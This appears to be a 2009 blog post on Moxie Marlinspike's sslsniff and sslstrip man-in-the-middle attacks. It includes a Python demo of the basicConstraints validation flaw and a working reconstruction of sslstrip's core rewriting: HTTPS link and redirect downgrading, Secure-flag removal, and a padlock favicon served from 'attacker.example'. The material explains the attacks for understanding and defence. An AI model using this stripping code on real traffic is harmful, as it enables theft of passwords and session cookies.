When man-in-the-middle attacks become dangerously easy to set up

Once in a while you get a wake-up call and it feels like a bubble bursting. This happened after watching Moxie Marlinspike's persuasive presentation at the Black Hat DC conference earlier this year (see the presentation here). Moxie explains what he has been doing with sslsniff and, more recently, sslstrip.

sslsniff was written in 2002 to demonstrate a flaw in browsers' certificate chain validation: several browsers did not check the basicConstraints extension, so any ordinary site certificate issued by a trusted CA could in turn sign a certificate for any other site. sslsniff generates such a certificate for the requested site in real time, the browser accepts it, and the user sees nothing unusual. The same tool was later used with the famous MD5 collision by Alexander Sotirov et al., which produced a rogue CA certificate chaining to a trusted root.
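As an added illustration (my own example, not Moxie's code and not sslsniff itself), the following Python uses the `cryptography` package to build the situation sslsniff exploited: a root CA issues an ordinary end-entity certificate to a site, and the holder of that site's key then signs a certificate for a different hostname. A browser that skips the basicConstraints check accepts the second certificate; `validate_chain` below performs that check together with the issuer-name and signature checks and rejects it. The names `Demo Root CA`, `legit.example` and `bank.example` are constructed, and the checker deliberately leaves out validity dates, key usage, hostname matching and revocation, which a real validator must also do.

```python
import datetime

from cryptography import x509
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.x509.oid import NameOID


def _name(cn):
    return x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, cn)])


def make_cert(subject_cn, subject_key, issuer_cn, issuer_key, is_ca):
    """Issue a certificate for subject_cn signed by issuer_key, with an explicit basicConstraints."""
    now = datetime.datetime.now(datetime.timezone.utc)
    builder = (
        x509.CertificateBuilder()
        .subject_name(_name(subject_cn))
        .issuer_name(_name(issuer_cn))
        .public_key(subject_key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(now - datetime.timedelta(days=1))
        .not_valid_after(now + datetime.timedelta(days=30))
        .add_extension(x509.BasicConstraints(ca=is_ca, path_length=None), critical=True)
    )
    return builder.sign(issuer_key, hashes.SHA256())


def is_ca(cert):
    """True only if the certificate carries basicConstraints with CA=TRUE. No extension means no CA."""
    try:
        ext = cert.extensions.get_extension_for_class(x509.BasicConstraints)
    except x509.ExtensionNotFound:
        return False
    return ext.value.ca


def validate_chain(chain, trust_anchor):
    """chain[0] is the leaf; chain[-1] must be issued by trust_anchor.

    Returns None when the chain passes, otherwise a string naming the first failure.
    Only issuer names, signatures and basicConstraints are checked (see lead-in)."""
    issuers = chain[1:] + [trust_anchor]
    for cert, issuer in zip(chain, issuers):
        if cert.issuer != issuer.subject:
            return "issuer name mismatch for %s" % cert.subject.rfc4514_string()
        try:
            issuer.public_key().verify(
                cert.signature, cert.tbs_certificate_bytes,
                padding.PKCS1v15(), cert.signature_hash_algorithm,
            )
        except InvalidSignature:
            return "bad signature on %s" % cert.subject.rfc4514_string()
        # The check the 2002 browsers skipped: whoever signed this cert must itself be a CA.
        if not is_ca(issuer):
            return "%s signed a certificate but is not a CA" % issuer.subject.rfc4514_string()
    return None


def build_demo():
    """Constructed scenario: the root issues a normal leaf to legit.example, and the holder
    of that leaf key then 'issues' a certificate for bank.example, as sslsniff did on the fly."""
    root_key = rsa.generate_private_key(65537, 2048)
    site_key = rsa.generate_private_key(65537, 2048)
    rogue_key = rsa.generate_private_key(65537, 2048)
    root = make_cert("Demo Root CA", root_key, "Demo Root CA", root_key, True)
    site = make_cert("legit.example", site_key, "Demo Root CA", root_key, False)
    rogue = make_cert("bank.example", rogue_key, "legit.example", site_key, False)
    return root, site, rogue


if __name__ == "__main__":
    root, site, rogue = build_demo()
    print("legit.example chain:", validate_chain([site], root))
    print("bank.example chain: ", validate_chain([rogue, site], root))
```

Both signatures in the rogue chain verify and every issuer name matches its parent's subject, so a validator that stops there accepts `bank.example`; only the basicConstraints check on `legit.example` catches it.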

sslstrip performs an active man-in-the-middle attack: it sits between the user and e.g. a bank, relays the traffic and rewrites it in flight. Every https:// link and redirect in the pages it passes on is turned into plain http://, so the user's browser never sets up an encrypted session, while sslstrip itself talks HTTPS to the real site, which sees an ordinary TLS client. The attacker can then read and alter everything that passes, passwords and session cookies included.
Moxie ran sslstrip for 24 hours on a Tor exit node without any of the affected users noticing.
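To make the mechanism concrete, here is an added Python example of the core rewriting sslstrip performs. It is my own simplified reconstruction, not sslstrip's source; the hostnames `bank.example` and `attacker.example`, the sample login page and the headers are constructed. It covers the three pieces a practitioner should recognise: downgrading https:// links, redirects and the Secure cookie flag in responses heading to the victim, remembering which URLs were downgraded so the matching requests can be sent to the real site over HTTPS, and swapping the favicon for a padlock so the tab still looks "secure".

```python
import re

# Two places to rewrite in the body: absolute https:// URLs (links, form actions, scripts)
# and the favicon link, which is swapped for a padlock icon.
HTTPS_URL_RE = re.compile(r"""https://[^\s"'<>]+""", re.IGNORECASE)
FAVICON_RE = re.compile(r"""(<link[^>]*rel=["'](?:shortcut )?icon["'][^>]*href=["'])([^"']*)""", re.IGNORECASE)
SECURE_FLAG_RE = re.compile(r";\s*secure(?=;|$)", re.IGNORECASE)

# Constructed: the real tool serves its own lock favicon.
PADLOCK_ICON = "http://attacker.example/lock.ico"


class StripState:
    """Remembers which URLs were downgraded, so the proxy later knows to fetch the victim's
    plain-http request from the real site over https (the role of sslstrip's URL monitor)."""

    def __init__(self):
        self.stripped = set()

    def downgrade(self, url):
        rest = url[len("https://"):]
        self.stripped.add(rest)
        return "http://" + rest


def strip_response_body(body, state):
    """Server -> victim direction: rewrite every https:// URL to http:// and replace the
    favicon so the tab shows a padlock although the session is plain HTTP."""
    body = HTTPS_URL_RE.sub(lambda m: state.downgrade(m.group(0)), body)
    body = FAVICON_RE.sub(lambda m: m.group(1) + PADLOCK_ICON, body)
    return body


def strip_response_headers(headers, state):
    """Same direction, for headers: downgrade https redirects and drop the Secure cookie
    flag so the browser keeps sending the session cookie over plain HTTP."""
    out = []
    for name, value in headers:
        lname = name.lower()
        if lname == "location" and value.lower().startswith("https://"):
            value = state.downgrade(value)
        elif lname == "set-cookie":
            value = SECURE_FLAG_RE.sub("", value)
        out.append((name, value))
    return out


def upgrade_request_url(url, state):
    """Victim -> server direction: the victim asks for http://...; if that URL is one we
    stripped, the proxy fetches it over https so the real site sees a normal TLS client."""
    if url.lower().startswith("http://"):
        rest = url[len("http://"):]
        if rest in state.stripped:
            return "https://" + rest
    return url


def demo():
    """Run the three steps over a constructed bank login page and its response headers."""
    state = StripState()
    page = ('<html><head><link rel="shortcut icon" href="https://bank.example/favicon.ico"></head>'
            '<body><a href="https://bank.example/login">Log in</a>'
            '<form action="https://bank.example/auth" method="post"></form></body></html>')
    headers = [("Location", "https://bank.example/login"),
               ("Set-Cookie", "session=abc123; Secure; HttpOnly")]
    stripped_page = strip_response_body(page, state)
    stripped_headers = strip_response_headers(headers, state)
    # The victim now follows the plain-http login link; the proxy upgrades it upstream.
    upstream = upgrade_request_url("http://bank.example/login", state)
    return stripped_page, stripped_headers, upstream


if __name__ == "__main__":
    page, headers, upstream = demo()
    print(page)
    print(headers)
    print("proxy fetches:", upstream)
```

Note what the victim's browser sees after this: an http:// URL, no certificate at all, a padlock favicon, and a session cookie it will happily send in the clear. Nothing in that picture is an error condition from the browser's point of view, which is why the attack goes unnoticed.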


In addition to this, Moxie presents insightful observations on the usability problem of communicating risk to the end-user. End-users have only a limited ability to tell when a browser session is secure and when it is not, and the presentation illustrates this clearly. Banks today put padlock symbols on pages served over plain HTTP to communicate trust, and research indicates that such mechanisms give users a false sense of security; the user lowers his guard and becomes more susceptible to fraud. A padlock drawn inside the page proves nothing, since anyone who can rewrite the page can draw one (sslstrip even swaps the site's favicon for a padlock); only the browser's own indicator reflects the actual state of the connection.

Another interesting point concerns the new EV certificates. A user's mind does not care whether the address bar is green or white; he only takes notice when it is red, because only then does he have to break a habit and take action. If the address bar is green it is very unlikely that the user will also inspect the URL, and I think we will soon see even more interesting attacks that combine homograph attacks and EV certificates with sslstrip…


~ by petergullberg on July 22, 2009.